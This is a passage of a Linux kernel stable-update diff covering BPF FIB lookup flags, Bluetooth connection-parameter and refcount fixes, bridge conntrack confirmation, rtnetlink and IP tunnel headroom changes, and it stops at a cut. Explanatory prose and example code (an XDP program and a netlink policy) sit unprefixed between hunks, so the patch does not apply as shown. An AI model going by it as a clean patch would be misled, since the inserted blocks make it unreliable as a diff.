++	ib_cm_event(APR_RECEIVED)		\
++	ib_cm_event(SIDR_REQ_ERROR)		\
++	ib_cm_event(SIDR_REQ_RECEIVED)		\
++	ib_cm_event_end(SIDR_REP_RECEIVED)
++
++#undef ib_cm_event
++#undef ib_cm_event_end
++
++#define ib_cm_event(x)		TRACE_DEFINE_ENUM(IB_CM_##x);
++#define ib_cm_event_end(x)	TRACE_DEFINE_ENUM(IB_CM_##x);
++
++IB_CM_EVENT_LIST
++
++#undef ib_cm_event
++#undef ib_cm_event_end
++
++#define ib_cm_event(x)		{ IB_CM_##x, #x },
++#define ib_cm_event_end(x)	{ IB_CM_##x, #x }
++
++#define rdma_show_ib_cm_event(x) \
++		__print_symbolic(x, IB_CM_EVENT_LIST)
++
++/*
++ * enum rdma_cm_event_type, from include/rdma/rdma_cm.h
++ */
++#define RDMA_CM_EVENT_LIST			\
++	rdma_cm_event(ADDR_RESOLVED)		\
++	rdma_cm_event(ADDR_ERROR)		\
++	rdma_cm_event(ROUTE_RESOLVED)		\
++	rdma_cm_event(ROUTE_ERROR)		\
++	rdma_cm_event(CONNECT_REQUEST)		\
++	rdma_cm_event(CONNECT_RESPONSE)		\
++	rdma_cm_event(CONNECT_ERROR)		\
++	rdma_cm_event(UNREACHABLE)		\
++	rdma_cm_event(REJECTED)			\
++	rdma_cm_event(ESTABLISHED)		\
++	rdma_cm_event(DISCONNECTED)		\
++	rdma_cm_event(DEVICE_REMOVAL)		\
++	rdma_cm_event(MULTICAST_JOIN)		\
++	rdma_cm_event(MULTICAST_ERROR)		\
++	rdma_cm_event(ADDR_CHANGE)		\
++	rdma_cm_event_end(TIMEWAIT_EXIT)
++
++#undef rdma_cm_event
++#undef rdma_cm_event_end
++
++#define rdma_cm_event(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
++#define rdma_cm_event_end(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
++
++RDMA_CM_EVENT_LIST
++
++#undef rdma_cm_event
++#undef rdma_cm_event_end
++
++#define rdma_cm_event(x)	{ RDMA_CM_EVENT_##x, #x },
++#define rdma_cm_event_end(x)	{ RDMA_CM_EVENT_##x, #x }
++
++#define rdma_show_cm_event(x) \
++		__print_symbolic(x, RDMA_CM_EVENT_LIST)
+diff --git a/include/trace/misc/sunrpc.h b/include/trace/misc/sunrpc.h
+new file mode 100644
+index 0000000000000..588557d07ea82
+--- /dev/null
++++ b/include/trace/misc/sunrpc.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2021 Oracle and/or its affiliates.
++ *
++ * Common types and format specifiers for sunrpc.
++ */
++
++#if !defined(_TRACE_SUNRPC_BASE_H)
++#define _TRACE_SUNRPC_BASE_H
++
++#include <linux/tracepoint.h>
++
++#define SUNRPC_TRACE_PID_SPECIFIER	"%08x"
++#define SUNRPC_TRACE_CLID_SPECIFIER	"%08x"
++#define SUNRPC_TRACE_TASK_SPECIFIER \
++	"task:" SUNRPC_TRACE_PID_SPECIFIER "@" SUNRPC_TRACE_CLID_SPECIFIER
++
++#endif /* _TRACE_SUNRPC_BASE_H */
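For reference, these specifiers are meant to be string-concatenated into trace event format strings. A hedged sketch of typical use inside a TP_printk() (the event fields shown are illustrative, not part of this patch):

	/* illustrative only: assumes the event's TP_fast_assign() recorded
	 * __entry->task_id, __entry->client_id and __entry->status
	 */
	TP_printk(SUNRPC_TRACE_TASK_SPECIFIER " status=%d",
		  __entry->task_id, __entry->client_id, __entry->status)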
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 201dc77ebbd77..d5d2183730b9f 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -3109,6 +3109,10 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_DIRECT**
+  *			Do a direct table lookup vs full lookup using FIB
+  *			rules.
++ *		**BPF_FIB_LOOKUP_TBID**
++ *			Used with BPF_FIB_LOOKUP_DIRECT.
++ *			Use the routing table ID present in *params*->tbid
++ *			for the fib lookup.
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
+@@ -3117,6 +3121,11 @@ union bpf_attr {
+  *			and *params*->smac will not be set as output. A common
+  *			use case is to call **bpf_redirect_neigh**\ () after
+  *			doing **bpf_fib_lookup**\ ().
++ *		**BPF_FIB_LOOKUP_SRC**
++ *			Derive and set source IP addr in *params*->ipv{4,6}_src
++ *			for the nexthop. If the src addr cannot be derived,
++ *			**BPF_FIB_LKUP_RET_NO_SRC_ADDR** is returned. In this
++ *			case, *params*->dmac and *params*->smac are not set either.
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6687,6 +6696,8 @@ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
+ 	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
++	BPF_FIB_LOOKUP_TBID    = (1U << 3),
++	BPF_FIB_LOOKUP_SRC     = (1U << 4),
+ };
+ 
+ enum {
+@@ -6699,6 +6710,7 @@ enum {
+ 	BPF_FIB_LKUP_RET_UNSUPP_LWT,   /* fwd requires encapsulation */
+ 	BPF_FIB_LKUP_RET_NO_NEIGH,     /* no neighbor entry for nh */
+ 	BPF_FIB_LKUP_RET_FRAG_NEEDED,  /* fragmentation required to fwd */
++	BPF_FIB_LKUP_RET_NO_SRC_ADDR,  /* failed to derive IP src addr */
+ };
+ 
+ struct bpf_fib_lookup {
+@@ -6733,6 +6745,9 @@ struct bpf_fib_lookup {
+ 		__u32	rt_metric;
+ 	};
+ 
++	/* input: source address to consider for lookup
++	 * output: source address result from lookup
++	 */
+ 	union {
+ 		__be32		ipv4_src;
+ 		__u32		ipv6_src[4];  /* in6_addr; network order */
+@@ -6747,9 +6762,19 @@ struct bpf_fib_lookup {
+ 		__u32		ipv6_dst[4];  /* in6_addr; network order */
+ 	};
+ 
+-	/* output */
+-	__be16	h_vlan_proto;
+-	__be16	h_vlan_TCI;
++	union {
++		struct {
++			/* output */
++			__be16	h_vlan_proto;
++			__be16	h_vlan_TCI;
++		};
++		/* input: when accompanied by the
++		 * BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_TBID flags, a
++		 * specific routing table to use for the fib lookup.
++		 */
++		__u32	tbid;
++	};
++
+ 	__u8	smac[6];     /* ETH_ALEN */
+ 	__u8	dmac[6];     /* ETH_ALEN */
+ };
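Taken together, BPF_FIB_LOOKUP_TBID and BPF_FIB_LOOKUP_SRC let an XDP or tc program steer the FIB lookup to a specific routing table and have the kernel derive a source address for the nexthop. A minimal sketch, assuming IPv4 and an illustrative table ID of 100 (a real program would first parse the packet to fill in the destination and length fields):

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("xdp")
int fib_tbid_src(struct xdp_md *ctx)
{
	struct bpf_fib_lookup params = {};
	int rc;

	params.family	= 2;	/* AF_INET */
	params.ifindex	= ctx->ingress_ifindex;
	/* fill params.ipv4_dst, params.tot_len, ... from the packet here */
	params.tbid	= 100;	/* consulted because of _TBID below */

	rc = bpf_fib_lookup(ctx, &params, sizeof(params),
			    BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_TBID |
			    BPF_FIB_LOOKUP_SRC);
	if (rc == BPF_FIB_LKUP_RET_NO_SRC_ADDR)
		return XDP_DROP;	/* no usable source address */

	/* on BPF_FIB_LKUP_RET_SUCCESS, params.ipv4_src holds the derived
	 * source address and params.smac/dmac the nexthop L2 addresses
	 */
	return XDP_PASS;
}

char _license[] SEC("license") = "GPL";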
+diff --git a/include/uapi/linux/in6.h b/include/uapi/linux/in6.h
+index c4c53a9ab9595..ff8d21f9e95b7 100644
+--- a/include/uapi/linux/in6.h
++++ b/include/uapi/linux/in6.h
+@@ -145,7 +145,7 @@ struct in6_flowlabel_req {
+ #define IPV6_TLV_PADN		1
+ #define IPV6_TLV_ROUTERALERT	5
+ #define IPV6_TLV_CALIPSO	7	/* RFC 5570 */
+-#define IPV6_TLV_IOAM		49	/* TEMPORARY IANA allocation for IOAM */
++#define IPV6_TLV_IOAM		49	/* RFC 9486 */
+ #define IPV6_TLV_JUMBO		194
+ #define IPV6_TLV_HAO		201	/* home address option */
+ 
+diff --git a/lib/nlattr.c b/lib/nlattr.c
+index dffd60e4065fd..86344df0ccf7b 100644
+--- a/lib/nlattr.c
++++ b/lib/nlattr.c
+@@ -30,6 +30,8 @@ static const u8 nla_attr_len[NLA_TYPE_MAX+1] = {
+ 	[NLA_S16]	= sizeof(s16),
+ 	[NLA_S32]	= sizeof(s32),
+ 	[NLA_S64]	= sizeof(s64),
++	[NLA_BE16]	= sizeof(__be16),
++	[NLA_BE32]	= sizeof(__be32),
+ };
+ 
+ static const u8 nla_attr_minlen[NLA_TYPE_MAX+1] = {
+@@ -43,6 +45,8 @@ static const u8 nla_attr_minlen[NLA_TYPE_MAX+1] = {
+ 	[NLA_S16]	= sizeof(s16),
+ 	[NLA_S32]	= sizeof(s32),
+ 	[NLA_S64]	= sizeof(s64),
++	[NLA_BE16]	= sizeof(__be16),
++	[NLA_BE32]	= sizeof(__be32),
+ };
+ 
+ /*
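With the big-endian types wired into the length tables above, netlink policies can validate __be16/__be32 attributes directly. A hedged sketch of such a policy (the attribute names are hypothetical; only the NLA_BE* usage is the point):

#include <net/netlink.h>

enum {
	DEMO_ATTR_UNSPEC,
	DEMO_ATTR_PORT,		/* __be16, network byte order */
	DEMO_ATTR_FLOWLABEL,	/* __be32, network byte order */
	__DEMO_ATTR_MAX,
};
#define DEMO_ATTR_MAX (__DEMO_ATTR_MAX - 1)

static const struct nla_policy demo_policy[DEMO_ATTR_MAX + 1] = {
	[DEMO_ATTR_PORT]	= { .type = NLA_BE16 },
	[DEMO_ATTR_FLOWLABEL]	= { .type = NLA_BE32 },
};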
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 59577946735b1..9736e762184bd 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -37,6 +37,7 @@
+ #include <linux/page_owner.h>
+ #include <linux/sched/sysctl.h>
+ #include <linux/memory-tiers.h>
++#include <linux/compat.h>
+ 
+ #include <asm/tlb.h>
+ #include <asm/pgalloc.h>
+@@ -607,6 +608,9 @@ static unsigned long __thp_get_unmapped_area(struct file *filp,
+ 	loff_t off_align = round_up(off, size);
+ 	unsigned long len_pad, ret;
+ 
++	if (IS_ENABLED(CONFIG_32BIT) || in_compat_syscall())
++		return 0;
++
+ 	if (off_end <= off_align || (off_end - off_align) < size)
+ 		return 0;
+ 
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 6a1db678d032f..a8932d449eb63 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1049,6 +1049,7 @@ static void hci_error_reset(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, error_reset);
+ 
++	hci_dev_hold(hdev);
+ 	BT_DBG("%s", hdev->name);
+ 
+ 	if (hdev->hw_error)
+@@ -1056,10 +1057,10 @@ static void hci_error_reset(struct work_struct *work)
+ 	else
+ 		bt_dev_err(hdev, "hardware error 0x%2.2x", hdev->hw_error_code);
+ 
+-	if (hci_dev_do_close(hdev))
+-		return;
++	if (!hci_dev_do_close(hdev))
++		hci_dev_do_open(hdev);
+ 
+-	hci_dev_do_open(hdev);
++	hci_dev_put(hdev);
+ }
+ 
+ void hci_uuids_clear(struct hci_dev *hdev)
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 56ecc5f97b916..452d839c152fc 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -5282,9 +5282,12 @@ static void hci_io_capa_request_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn || !hci_conn_ssp_enabled(conn))
++	if (!conn || !hci_dev_test_flag(hdev, HCI_SSP_ENABLED))
+ 		goto unlock;
+ 
++	/* Assume remote supports SSP since it has triggered this event */
++	set_bit(HCI_CONN_SSP_ENABLED, &conn->flags);
++
+ 	hci_conn_hold(conn);
+ 
+ 	if (!hci_dev_test_flag(hdev, HCI_MGMT))
+@@ -6716,6 +6719,10 @@ static void hci_le_remote_conn_param_req_evt(struct hci_dev *hdev, void *data,
+ 		return send_conn_param_neg_reply(hdev, handle,
+ 						 HCI_ERROR_UNKNOWN_CONN_ID);
+ 
++	if (max > hcon->le_conn_max_interval)
++		return send_conn_param_neg_reply(hdev, handle,
++						 HCI_ERROR_INVALID_LL_PARAMS);
++
+ 	if (hci_check_conn_params(min, max, latency, timeout))
+ 		return send_conn_param_neg_reply(hdev, handle,
+ 						 HCI_ERROR_INVALID_LL_PARAMS);
+@@ -7245,10 +7252,10 @@ static void hci_store_wake_reason(struct hci_dev *hdev, u8 event,
+ 	 * keep track of the bdaddr of the connection event that woke us up.
+ 	 */
+ 	if (event == HCI_EV_CONN_REQUEST) {
+-		bacpy(&hdev->wake_addr, &conn_complete->bdaddr);
++		bacpy(&hdev->wake_addr, &conn_request->bdaddr);
+ 		hdev->wake_addr_type = BDADDR_BREDR;
+ 	} else if (event == HCI_EV_CONN_COMPLETE) {
+-		bacpy(&hdev->wake_addr, &conn_request->bdaddr);
++		bacpy(&hdev->wake_addr, &conn_complete->bdaddr);
+ 		hdev->wake_addr_type = BDADDR_BREDR;
+ 	} else if (event == HCI_EV_LE_META) {
+ 		struct hci_ev_le_meta *le_ev = (void *)skb->data;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 45d19294aa772..a337340464567 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2251,8 +2251,11 @@ static int hci_le_add_accept_list_sync(struct hci_dev *hdev,
+ 
+ 	/* During suspend, only wakeable devices can be in acceptlist */
+ 	if (hdev->suspended &&
+-	    !(params->flags & HCI_CONN_FLAG_REMOTE_WAKEUP))
++	    !(params->flags & HCI_CONN_FLAG_REMOTE_WAKEUP)) {
++		hci_le_del_accept_list_sync(hdev, &params->addr,
++					    params->addr_type);
+ 		return 0;
++	}
+ 
+ 	/* Select filter policy to accept all advertising */
+ 	if (*num_entries >= hdev->le_accept_list_size)
+@@ -5482,7 +5485,7 @@ static int hci_inquiry_sync(struct hci_dev *hdev, u8 length)
+ 
+ 	bt_dev_dbg(hdev, "");
+ 
+-	if (hci_dev_test_flag(hdev, HCI_INQUIRY))
++	if (test_bit(HCI_INQUIRY, &hdev->flags))
+ 		return 0;
+ 
+ 	hci_dev_lock(hdev);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 81f5974e5eb5a..b4cba55be5ad9 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -5614,7 +5614,13 @@ static inline int l2cap_conn_param_update_req(struct l2cap_conn *conn,
+ 
+ 	memset(&rsp, 0, sizeof(rsp));
+ 
+-	err = hci_check_conn_params(min, max, latency, to_multiplier);
++	if (max > hcon->le_conn_max_interval) {
++		BT_DBG("requested connection interval exceeds current bounds.");
++		err = -EINVAL;
++	} else {
++		err = hci_check_conn_params(min, max, latency, to_multiplier);
++	}
++
+ 	if (err)
+ 		rsp.result = cpu_to_le16(L2CAP_CONN_PARAM_REJECTED);
+ 	else
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 202ad43e35d6b..bff48d5763635 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -43,6 +43,10 @@
+ #include <linux/sysctl.h>
+ #endif
+ 
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++#include <net/netfilter/nf_conntrack_core.h>
++#endif
++
+ static unsigned int brnf_net_id __read_mostly;
+ 
+ struct brnf_net {
+@@ -553,6 +557,90 @@ static unsigned int br_nf_pre_routing(void *priv,
+ 	return NF_STOLEN;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++/* conntracks' nf_confirm logic cannot handle cloned skbs referencing
++ * the same nf_conn entry, which will happen for multicast (broadcast)
++ * frames on bridges.
++ *
++ * Example:
++ *      macvlan0
++ *      br0
++ *  ethX  ethY
++ *
++ * ethX (or Y) receives multicast or broadcast packet containing
++ * an IP packet, not yet in conntrack table.
++ *
++ * 1. skb passes through bridge and fake-ip (br_netfilter) Prerouting.
++ *    -> skb->_nfct now references an unconfirmed entry
++ * 2. skb is a broad/mcast packet. The bridge now passes clones out on each
++ *    bridge interface.
++ * 3. skb gets passed up the stack.
++ * 4. In macvlan case, macvlan driver retains clone(s) of the mcast skb
++ *    and schedules a work queue to send them out on the lower devices.
++ *
++ *    The clone skb->_nfct is not a copy, it is the same entry as the
++ *    original skb.  The macvlan rx handler then returns RX_HANDLER_PASS.
++ * 5. Normal conntrack hooks (in NF_INET_LOCAL_IN) confirm the orig skb.
++ *
++ * The macvlan broadcast worker and the normal confirm path will race.
++ *
++ * This race will not happen if step 2 already confirmed a clone. In that
++ * case, later steps perform skb_clone() with skb->_nfct already confirmed
++ * (in the hash table).  This works fine.
++ *
++ * But such confirmation won't happen when eb/ip/nftables rules drop the
++ * packets before they reach the nf_confirm step in postrouting.
++ *
++ * Work around this problem by explicit confirmation of the entry at
++ * LOCAL_IN time, before the upper layer has a chance to clone the unconfirmed
++ * entry.
++ *
++ */
++static unsigned int br_nf_local_in(void *priv,
++				   struct sk_buff *skb,
++				   const struct nf_hook_state *state)
++{
++	struct nf_conntrack *nfct = skb_nfct(skb);
++	const struct nf_ct_hook *ct_hook;
++	struct nf_conn *ct;
++	int ret;
++
++	if (!nfct || skb->pkt_type == PACKET_HOST)
++		return NF_ACCEPT;
++
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	if (likely(nf_ct_is_confirmed(ct)))
++		return NF_ACCEPT;
++
++	WARN_ON_ONCE(skb_shared(skb));
++	WARN_ON_ONCE(refcount_read(&nfct->use) != 1);
++
++	/* We can't call nf_confirm here; it would create a dependency
++	 * on the nf_conntrack module.
++	 */
++	ct_hook = rcu_dereference(nf_ct_hook);
++	if (!ct_hook) {
++		skb->_nfct = 0ul;
++		nf_conntrack_put(nfct);
++		return NF_ACCEPT;
++	}
++
++	nf_bridge_pull_encap_header(skb);
++	ret = ct_hook->confirm(skb);
++	switch (ret & NF_VERDICT_MASK) {
++	case NF_STOLEN:
++		return NF_STOLEN;
++	default:
++		nf_bridge_push_encap_header(skb);
++		break;
++	}
++
++	ct = container_of(nfct, struct nf_conn, ct_general);
++	WARN_ON_ONCE(!nf_ct_is_confirmed(ct));
++
++	return ret;
++}
++#endif
+ 
+ /* PF_BRIDGE/FORWARD *************************************************/
+ static int br_nf_forward_finish(struct net *net, struct sock *sk, struct sk_buff *skb)
+@@ -962,6 +1050,14 @@ static const struct nf_hook_ops br_nf_ops[] = {
+ 		.hooknum = NF_BR_PRE_ROUTING,
+ 		.priority = NF_BR_PRI_BRNF,
+ 	},
++#if IS_ENABLED(CONFIG_NF_CONNTRACK)
++	{
++		.hook = br_nf_local_in,
++		.pf = NFPROTO_BRIDGE,
++		.hooknum = NF_BR_LOCAL_IN,
++		.priority = NF_BR_PRI_LAST,
++	},
++#endif
+ 	{
+ 		.hook = br_nf_forward_ip,
+ 		.pf = NFPROTO_BRIDGE,
+diff --git a/net/bridge/netfilter/nf_conntrack_bridge.c b/net/bridge/netfilter/nf_conntrack_bridge.c
+index 06d94b2c6b5de..c7c27ada67044 100644
+--- a/net/bridge/netfilter/nf_conntrack_bridge.c
++++ b/net/bridge/netfilter/nf_conntrack_bridge.c
+@@ -291,6 +291,30 @@ static unsigned int nf_ct_bridge_pre(void *priv, struct sk_buff *skb,
+ 	return nf_conntrack_in(skb, &bridge_state);
+ }
+ 
++static unsigned int nf_ct_bridge_in(void *priv, struct sk_buff *skb,
++				    const struct nf_hook_state *state)
++{
++	enum ip_conntrack_info ctinfo;
++	struct nf_conn *ct;
++
++	if (skb->pkt_type == PACKET_HOST)
++		return NF_ACCEPT;
++
++	/* nf_conntrack_confirm() cannot handle concurrent clones;
++	 * this happens for broad/multicast frames with e.g. macvlan on top
++	 * of the bridge device.
++	 */
++	ct = nf_ct_get(skb, &ctinfo);
++	if (!ct || nf_ct_is_confirmed(ct) || nf_ct_is_template(ct))
++		return NF_ACCEPT;
++
++	/* let inet prerouting call conntrack again */
++	skb->_nfct = 0;
++	nf_ct_put(ct);
++
++	return NF_ACCEPT;
++}
++
+ static void nf_ct_bridge_frag_save(struct sk_buff *skb,
+ 				   struct nf_bridge_frag_data *data)
+ {
+@@ -415,6 +439,12 @@ static struct nf_hook_ops nf_ct_bridge_hook_ops[] __read_mostly = {
+ 		.hooknum	= NF_BR_PRE_ROUTING,
+ 		.priority	= NF_IP_PRI_CONNTRACK,
+ 	},
++	{
++		.hook		= nf_ct_bridge_in,
++		.pf		= NFPROTO_BRIDGE,
++		.hooknum	= NF_BR_LOCAL_IN,
++		.priority	= NF_IP_PRI_CONNTRACK_CONFIRM,
++	},
+ 	{
+ 		.hook		= nf_ct_bridge_post,
+ 		.pf		= NFPROTO_BRIDGE,
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 3a6110ea4009f..cb7c4651eaec8 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5752,6 +5752,12 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		u32 tbid = l3mdev_fib_table_rcu(dev) ? : RT_TABLE_MAIN;
+ 		struct fib_table *tb;
+ 
++		if (flags & BPF_FIB_LOOKUP_TBID) {
++			tbid = params->tbid;
++			/* zero out for vlan output */
++			params->tbid = 0;
++		}
++
+ 		tb = fib_get_table(net, tbid);
+ 		if (unlikely(!tb))
+ 			return BPF_FIB_LKUP_RET_NOT_FWDED;
+@@ -5803,6 +5809,9 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.fi->fib_priority;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SRC)
++		params->ipv4_src = fib_result_prefsrc(net, &res);
++
+ 	/* xdp and cls_bpf programs are run in RCU-bh so
+ 	 * rcu_read_lock_bh is not needed here
+ 	 */
+@@ -5885,6 +5894,12 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		u32 tbid = l3mdev_fib_table_rcu(dev) ? : RT_TABLE_MAIN;
+ 		struct fib6_table *tb;
+ 
++		if (flags & BPF_FIB_LOOKUP_TBID) {
++			tbid = params->tbid;
++			/* zero out for vlan output */
++			params->tbid = 0;
++		}
++
+ 		tb = ipv6_stub->fib6_get_table(net, tbid);
+ 		if (unlikely(!tb))
+ 			return BPF_FIB_LKUP_RET_NOT_FWDED;
+@@ -5939,6 +5954,18 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.f6i->fib6_metric;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SRC) {
++		if (res.f6i->fib6_prefsrc.plen) {
++			*src = res.f6i->fib6_prefsrc.addr;
++		} else {
++			err = ipv6_bpf_stub->ipv6_dev_get_saddr(net, dev,
++								&fl6.daddr, 0,
++								src);
++			if (err)
++				return BPF_FIB_LKUP_RET_NO_SRC_ADDR;
++		}
++	}
++
+ 	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
+ 		goto set_fwd_params;
+ 
+@@ -5957,7 +5984,8 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ #endif
+ 
+ #define BPF_FIB_LOOKUP_MASK (BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT | \
+-			     BPF_FIB_LOOKUP_SKIP_NEIGH)
++			     BPF_FIB_LOOKUP_SKIP_NEIGH | BPF_FIB_LOOKUP_TBID | \
++			     BPF_FIB_LOOKUP_SRC)
+ 
+ BPF_CALL_4(bpf_xdp_fib_lookup, struct xdp_buff *, ctx,
+ 	   struct bpf_fib_lookup *, params, int, plen, u32, flags)
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 7cf1e42d7f93b..ac379e4590f8d 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5026,10 +5026,9 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	struct net *net = sock_net(skb->sk);
+ 	struct ifinfomsg *ifm;
+ 	struct net_device *dev;
+-	struct nlattr *br_spec, *attr = NULL;
++	struct nlattr *br_spec, *attr, *br_flags_attr = NULL;
+ 	int rem, err = -EOPNOTSUPP;
+ 	u16 flags = 0;
+-	bool have_flags = false;
+ 
+ 	if (nlmsg_len(nlh) < sizeof(*ifm))
+ 		return -EINVAL;
+@@ -5047,11 +5046,11 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
+ 	if (br_spec) {
+ 		nla_for_each_nested(attr, br_spec, rem) {
+-			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !have_flags) {
++			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !br_flags_attr) {
+ 				if (nla_len(attr) < sizeof(flags))
+ 					return -EINVAL;
+ 
+-				have_flags = true;
++				br_flags_attr = attr;
+ 				flags = nla_get_u16(attr);
+ 			}
+ 
+@@ -5095,8 +5094,8 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 		}
+ 	}
+ 
+-	if (have_flags)
+-		memcpy(nla_data(attr), &flags, sizeof(flags));
++	if (br_flags_attr)
++		memcpy(nla_data(br_flags_attr), &flags, sizeof(flags));
+ out:
+ 	return err;
+ }
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 80cdc6f6b34c9..0323ab5023c69 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -83,7 +83,7 @@ static bool is_supervision_frame(struct hsr_priv *hsr, struct sk_buff *skb)
+ 		return false;
+ 
+ 	/* Get next tlv */
+-	total_length += sizeof(struct hsr_sup_tlv) + hsr_sup_tag->tlv.HSR_TLV_length;
++	total_length += hsr_sup_tag->tlv.HSR_TLV_length;
+ 	if (!pskb_may_pull(skb, total_length))
+ 		return false;
+ 	skb_pull(skb, total_length);
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 24961b304dad0..328f9068c6a43 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -540,6 +540,20 @@ static int tnl_update_pmtu(struct net_device *dev, struct sk_buff *skb,
+ 	return 0;
+ }
+ 
++static void ip_tunnel_adj_headroom(struct net_device *dev, unsigned int headroom)
++{
++	/* we must cap headroom to some upper limit, else pskb_expand_head
++	 * will overflow header offsets in skb_headers_offset_update().
++	 */
++	static const unsigned int max_allowed = 512;
++
++	if (headroom > max_allowed)
++		headroom = max_allowed;
++
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
++}
++
+ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 		       u8 proto, int tunnel_hlen)
+ {
+@@ -614,13 +628,13 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > READ_ONCE(dev->needed_headroom))
+-		WRITE_ONCE(dev->needed_headroom, headroom);
+-
+-	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
++	if (skb_cow_head(skb, headroom)) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
++
++	ip_tunnel_adj_headroom(dev, headroom);
++
+ 	iptunnel_xmit(NULL, rt, skb, fl4.saddr, fl4.daddr, proto, tos, ttl,
+ 		      df, !net_eq(tunnel->net, dev_net(dev)));
+ 	return;
+@@ -800,16 +814,16 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > READ_ONCE(dev->needed_headroom))
+-		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
++	if (skb_cow_head(skb, max_headroom)) {
+ 		ip_rt_put(rt);
+ 		dev->stats.tx_dropped++;
+ 		kfree_skb(skb);
+ 		return;
+ 	}
+ 
++	ip_tunnel_adj_headroom(dev, max_headroom);
++
+ 	iptunnel_xmit(NULL, rt, skb, fl4.saddr, fl4.daddr, protocol, tos, ttl,
+ 		      df, !net_eq(tunnel->net, dev_net(dev)));
+ 	return;
+diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
+index 4073762996e22..fc761915c5f6f 100644
+--- a/net/ipv4/netfilter/nf_reject_ipv4.c
++++ b/net/ipv4/netfilter/nf_reject_ipv4.c
